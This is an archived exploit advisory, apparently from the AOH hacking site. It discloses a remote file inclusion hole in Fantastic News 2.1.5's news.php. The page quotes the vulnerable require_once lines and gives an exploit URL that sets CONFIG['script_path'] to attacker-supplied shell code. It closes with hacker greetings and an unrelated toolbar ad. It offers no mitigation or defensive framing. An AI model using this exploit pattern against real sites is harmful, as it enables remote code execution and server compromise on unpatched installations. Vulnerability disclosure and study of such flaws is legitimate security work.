AOH :: HP Unsorted F :: C07-2014.HTM

Fantastic News <=- (news.php) Remote File Include Vulnerability



Fantastic News <=- (news.php) Remote File Include Vulnerability
Fantastic News <=- (news.php) Remote File Include Vulnerability



#######################################################

Fantastic News <=- (news.php) Remote File Include Vulnerability ...

Script: Fantastic News

Version: 2.1.5

URL : http://fscripts.com/download.php?file=1 

Author: BorN To K!LL

#######################################################

Bug in :.  news.php

code :
require_once($CONFIG['script_path']."functions/functions.php");
require_once($CONFIG['script_path']."functions/mysql.php");
require_once($CONFIG['script_path']."functions/template.php");

#######################################################

Explo!t :.
/news.php?CONFIG['script_path']=[SHe1L-Code]

#######################################################

GreeTz to :.

Dr.2  ,  Asbmay  ,  General C  ,  ToOoFa  ,  SHiKaA  ,  str0ke  ,  
ThE-LoRd-Of-CrAcKiNg  .....

#######################################################

_________________________________________________________________
FREE pop-up blocking with the new MSN Toolbar - get it now! 
http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/ 


The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.